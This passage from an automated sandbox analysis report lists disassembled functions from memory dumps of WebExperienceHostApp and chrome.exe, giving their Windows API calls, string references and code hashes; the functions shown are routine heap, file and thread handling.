Part of subcall function 00007FFDFBA44D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D58
Part of subcall function 00007FFDFBA44D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D70

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA4630A

Strings

:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFDFBA46315

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getmonthsmallocmemcpy
String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
API String ID: 1628830074-4232081075
Opcode ID: 0e3ca20c2d103951e4d7d7801fc3e20d684566a9d28fb9907ec1b8d7555c0598
Instruction ID: 77af06de107ce2f5b5a46e4c49338a7fdb39aa6496697c333cf71e6bb0f7b991
Opcode Fuzzy Hash: 0e3ca20c2d103951e4d7d7801fc3e20d684566a9d28fb9907ec1b8d7555c0598
Instruction Fuzzy Hash: 7FE06D21B0AB4281EB049F11E4A57797360EF04BC8F980030DA2D067BCEF7CD994C380

Function 00007FFDFBA46270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFBA4627D

Part of subcall function 00007FFDFBA44D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D32
Part of subcall function 00007FFDFBA44D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D58
Part of subcall function 00007FFDFBA44D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D70

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA4629A

Strings

:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFDFBA462A5

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getdaysmallocmemcpy
String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1347072587-3283725177
Opcode ID: e3e5c3688c4805bfe07b39f3b0bc76f695c360df353ad2bd69f5daf1469f8f09
Instruction ID: 3f27e17123a477de4532410eb735f87d5e60c9166e6d5bb48385815b4ff0174f
Opcode Fuzzy Hash: e3e5c3688c4805bfe07b39f3b0bc76f695c360df353ad2bd69f5daf1469f8f09
Instruction Fuzzy Hash: 49E06D21B1AB43C2EB009B21E4A4769B360EF44BC8F588030DA2D0A7BCDFBCD884C350

Function 00007FFDFBA469E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFBA469ED

Part of subcall function 00007FFDFBA44D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DB9
Part of subcall function 00007FFDFBA44D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DE8
Part of subcall function 00007FFDFBA44D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DFF

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA46A0A

Strings

:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFDFBA46A15

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getmonthsmallocmemcpy
String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece
API String ID: 1628830074-2030377133
Opcode ID: 27da167e1864dcdf294359a8b0a44747903f76c57d9256877098d303ea31171d
Instruction ID: 5694ce930b39bd2d4924b6e1a183e1b21b108b0123d395710fb1c3205e1fc01b
Opcode Fuzzy Hash: 27da167e1864dcdf294359a8b0a44747903f76c57d9256877098d303ea31171d
Instruction Fuzzy Hash: BCE0392171AB0281EB408B21F4A476973A5EF04B88F445030DA1E063A8DF7CD8C4C780

Function 00007FFDFBA46990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFBA4699D

Part of subcall function 00007FFDFBA44D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DB9
Part of subcall function 00007FFDFBA44D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DE8
Part of subcall function 00007FFDFBA44D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFDFBA571DD,?,?,?,?,?,?,?,?,?,00007FFDFBA5B15E), ref: 00007FFDFBA44DFF

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA469BA

Strings

:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFDFBA469C5

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getdaysmallocmemcpy
String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1347072587-3283725177
Opcode ID: f597a48114be3c6915887c42bc8e5feb8ace438d66b9616608920e23ae2e9610
Instruction ID: 554bb1ff1f204d9e0ef8a7b1b96ba23e2bf02beeb5b30cded98f5145dfedb128
Opcode Fuzzy Hash: f597a48114be3c6915887c42bc8e5feb8ace438d66b9616608920e23ae2e9610
Instruction Fuzzy Hash: 8BE0392270AB0291EB108F11E4A476973B0EF08B98F581130DA1D063ADDFBCD884C740

Function 00007FF625A17750 Relevance: 5.1, APIs: 4, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF625A14580: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF625A153C5,?,?,00000000,00007FF625A15353), ref: 00007FF625A1458F
Part of subcall function 00007FF625A14580: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF625A153C5,?,?,00000000,00007FF625A15353), ref: 00007FF625A1459D
Part of subcall function 00007FF625A14580: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF625A153C5,?,?,00000000,00007FF625A15353), ref: 00007FF625A145B2

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF625A1780C
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF625A1781A

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 468bbb36f5f0524bfad220df1c36bc57dc39595cc71b805c81501286b27ccc0c
Instruction ID: e508cdf106ba4bb070c25085dcd686afdf53dd96a4895fe85edefa3a9744f8b9
Opcode Fuzzy Hash: 468bbb36f5f0524bfad220df1c36bc57dc39595cc71b805c81501286b27ccc0c
Instruction Fuzzy Hash: 11319562B1854282EF30EF25D8122A967A0EF98F94F44C131EA4DC7696EF3CED45C712

Function 00007FF625A16CB0 Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF625A16878,?,?,?,00007FF625A167A6), ref: 00007FF625A16CE7
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF625A16878,?,?,?,00007FF625A167A6), ref: 00007FF625A16CF5
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF625A16878,?,?,?,00007FF625A167A6), ref: 00007FF625A16D13
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF625A16878,?,?,?,00007FF625A167A6), ref: 00007FF625A16D21

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0056834fd57f5863927073a6cb3a8cdd4485bbb69fd36fa37474e5618a9aa299
Instruction ID: 3c65fe619de9636eebe5e66097e3aa4d12edb9c4cf9ccf072aaf1ee520d0339a
Opcode Fuzzy Hash: 0056834fd57f5863927073a6cb3a8cdd4485bbb69fd36fa37474e5618a9aa299
Instruction Fuzzy Hash: 1A016DB6B04B4186EB209F66F9410A977A1FB48BD0B588031DF4E53B24DF38E9A6C350

Function 00007FFDFBA59450 Relevance: 5.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA5946D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA59477
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA59481
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA5948B

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1408db0c91c4afda7cd62dbc657a8b28289742c7a241f7735ef7cac3faab0118
Instruction ID: 0241af273c7505d6496b3da760ead94727085472d72be6b21f00f65526c7944f
Opcode Fuzzy Hash: 1408db0c91c4afda7cd62dbc657a8b28289742c7a241f7735ef7cac3faab0118
Instruction Fuzzy Hash: BDF03C3571AB0392EB449B15E9B55687370FB88BD4F104030CA6D07BB8DFACE4A58700

Function 00007FFDFBA72820 Relevance: 5.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA7283D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA72847
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA72851
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA7285B

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 28282babf5ab9a79a3e9250d435ee7dac1d2215b7bc58fb2e129965c8d656ec7
Instruction ID: 2dbe4b84195bd28034352c8e5823ce75909e83c19e200a983339735bbf7a3a59
Opcode Fuzzy Hash: 28282babf5ab9a79a3e9250d435ee7dac1d2215b7bc58fb2e129965c8d656ec7
Instruction Fuzzy Hash: 4AF03C25B1AB0382EB449B15E9B55297370FB88FD8F104131CA6D03BB8DFACE4A59700

Function 00007FFDFBA594C0 Relevance: 5.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA594DD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA594E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA594F1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA594FB

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 78515aec29c92e18f2c63f3efd2ffdad150a398ddd245488889049c7a56c38d1
Instruction ID: c71bc16a45f9f2792d003cd5fb3b828667981c9fa5aa5673aca7da89b5cb0b37
Opcode Fuzzy Hash: 78515aec29c92e18f2c63f3efd2ffdad150a398ddd245488889049c7a56c38d1
Instruction Fuzzy Hash: B3F03C2571AB0392EB449B15E9B55287370FB88BC4F104030CA6D03BB8DFACE4A99700

Function 00007FFDFBA591F8 Relevance: 5.0, APIs: 4, Instructions: 16COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA5920A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA59214
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA5921E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA59228

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7ad3a6edda06eaf9da7d43210142655a193d10ee84286b762144f3f5892102b8
Instruction ID: 7bdb3bcfd3c03dd40d94ed94fadf26e6404b8d8b1e8b5a47acb24e0efefa36c1
Opcode Fuzzy Hash: 7ad3a6edda06eaf9da7d43210142655a193d10ee84286b762144f3f5892102b8
Instruction Fuzzy Hash: 91E02866715B0682EF149F61D8754397374FF98F99B241131CE1D46278CFE8E495D700

Analysis Process: chrome.exePID: 7916, Parent PID: 7808COMMON

Non-executed Functions

Function 00007FF6456C9260 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 372fileCOMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32 ref: 00007FF6456C9289
LocalFree.KERNEL32 ref: 00007FF6456C9525
CreateFileW.KERNEL32 ref: 00007FF6456C961D
GetLastError.KERNEL32 ref: 00007FF6456C962B
SetLastError.KERNEL32 ref: 00007FF6456C9647

Strings

GetHandleVerifier, xrefs: 00007FF6456C97A2
AddACEToPath, xrefs: 00007FF6456C9432
unknown, xrefs: 00007FF6456C92D0, 00007FF6456C92F3
..\..\third_party\libc++\src\include\__string\char_traits.h:146: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF6456C93B2
..\..\base\win\security_util.cc, xrefs: 00007FF6456C9439
ScopedBlockingCall, xrefs: 00007FF6456C98A7

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ErrorLast$CreateFileFreeFrequencyLocalPerformanceQuery
String ID: ..\..\base\win\security_util.cc$..\..\third_party\libc++\src\include\__string\char_traits.h:146: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$AddACEToPath$GetHandleVerifier$ScopedBlockingCall$unknown
API String ID: 1041212472-3714041534
Opcode ID: 2a94ef9a2c619790470c30f70b427bbfb447ed72758ea588bfd145711e3ba0fc
Instruction ID: 7be6b66c9f333201725e77beb8aab89d863ec305851de30182af6c5c17c519d8
Opcode Fuzzy Hash: 2a94ef9a2c619790470c30f70b427bbfb447ed72758ea588bfd145711e3ba0fc
Instruction Fuzzy Hash: AD029031A0DA8285FB22BF25E4543FA63A1FF85B84F444131DA8D87AA5DF3CE985D700

Function 00007FF645691270 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 201filelibraryloaderCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF6456913EA
GetLastError.KERNEL32 ref: 00007FF6456913F8
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF645691426
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF64569148C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF64569149E
GetModuleHandleW.KERNEL32 ref: 00007FF645691506
GetProcAddress.KERNEL32 ref: 00007FF645691516
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B), ref: 00007FF64569154A

Strings

GetHandleVerifier, xrefs: 00007FF64569150C
..\..\base\files\file_win.cc, xrefs: 00007FF6456912C2
DoInitialize, xrefs: 00007FF6456912BB

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: ErrorLast$AddressCreateFileHandleModuleProc
String ID: ..\..\base\files\file_win.cc$DoInitialize$GetHandleVerifier
API String ID: 2959055312-1999724202
Opcode ID: b4213104a7f0ffe369f4dbb7d2f600790a4df51ea209aee29bdae8c187f37826
Instruction ID: ebc156c783728fe107e70b871a76302e34230faa3ae6a0a666067fe6986c1003
Opcode Fuzzy Hash: b4213104a7f0ffe369f4dbb7d2f600790a4df51ea209aee29bdae8c187f37826
Instruction Fuzzy Hash: 8C71FE62B1C65686FB24BB25E455BB96691AF85F80F504038CE8F83BE1DE3CEC469740

Function 00007FF6456BDD30 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6456BDE59
GetProcAddress.KERNEL32 ref: 00007FF6456BDE69
GetModuleHandleW.KERNEL32 ref: 00007FF6456BDEA1
GetProcAddress.KERNEL32 ref: 00007FF6456BDEB1
GetModuleHandleW.KERNEL32 ref: 00007FF6456BDEE9
GetProcAddress.KERNEL32 ref: 00007FF6456BDEF9
GetModuleHandleW.KERNEL32 ref: 00007FF6456BDF2D
GetProcAddress.KERNEL32 ref: 00007FF6456BDF3D

Strings

GetHandleVerifier, xrefs: 00007FF6456BDE5F, 00007FF6456BDEA7, 00007FF6456BDEEF, 00007FF6456BDF33

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: e168955269868264cdbf627760c72bc19899b8782ac0a2a38a0c1ff0ad0597a3
Instruction ID: c642b5ad6c454a71348fd83e616a3971f8c3d55f47135933d56656daa693540e
Opcode Fuzzy Hash: e168955269868264cdbf627760c72bc19899b8782ac0a2a38a0c1ff0ad0597a3
Instruction Fuzzy Hash: 01612834A0DA2796EA24BB25E4943796361AF45F80F544436E94FCA7F0DF7DAC46E300

Function 00007FF6456906F0 Relevance: 13.6, APIs: 9, Instructions: 110threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF645690750
GetThreadPriority.KERNEL32(?,?,?,?,?,?,?,?,00007FF6456892A7), ref: 00007FF645690755
GetCurrentThread.KERNEL32 ref: 00007FF64569075D
SetThreadPriority.KERNEL32(?,?,?,?,?,?,?,?,00007FF6456892A7), ref: 00007FF645690767
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,00007FF6456892A7), ref: 00007FF6456907CD
GetCurrentThread.KERNEL32 ref: 00007FF6456907D6
SetThreadPriority.KERNEL32(?,?,?,?,?,?,?,?,00007FF6456892A7), ref: 00007FF6456907E1
